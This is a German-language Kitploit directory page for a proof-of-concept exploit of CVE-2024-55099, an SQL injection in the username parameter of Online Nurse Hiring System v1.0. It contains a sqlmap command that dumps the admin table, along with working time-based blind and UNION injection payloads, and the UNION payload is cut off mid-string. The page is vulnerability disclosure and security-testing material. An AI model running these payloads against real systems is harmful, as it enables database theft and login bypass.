Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — Proof-of-concept-Exploit für CVE-2024-55099, der eine SQL-Injection im Online Nurse Hiring System v1.0 über einen unbereinigten Username-Parameter demonstriert und Datenbank-Enumeration sowie Authentifizierungsumgehung ermöglicht. | Kitploit
Tools/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsArchived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

Proof-of-concept-Exploit für CVE-2024-55099, der eine SQL-Injection im Online Nurse Hiring System v1.0 über einen unbereinigten Username-Parameter demonstriert und Datenbank-Enumeration sowie Authentifizierungsumgehung ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability

  • Exploit Author: ugurkarakoc

Hersteller-Webseite

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

Software-Link

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

Übersicht

  • Online-Nurse-Hiring-System-v1.0 weist eine unzureichende Eingabevalidierung und -bereinigung des Parameters 'username' auf, was eine Schwachstelle für SQL-Injection-Angriffe erzeugen kann, die unbefugten Zugriff auf die Datenbank ermöglicht und die Systemsicherheit gefährdet.

Schwachstellendetails

  • CVE ID: CVE-2024-55099
  • Betroffene Version: Online-Nurse-Hiring-System-v1.0
  • Verwundbare Datei: /admin/index.php.
  • Parameternamen: username
  • Angriffstyp: Lokal

Referenzen:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099

Beschreibung

  • Das Fehlen einer ordnungsgemäßen Eingabevalidierung und -bereinigung des Parameters 'username' ermöglicht es einem Angreifer, SQL-Injection-Abfragen zu erstellen, Authentifizierungsmechanismen zu umgehen und unbefugten Zugriff auf die Datenbank zu erlangen.

Proof of Concept (PoC):

  • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
root@kitploit:~
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---

image

Tool herunterladen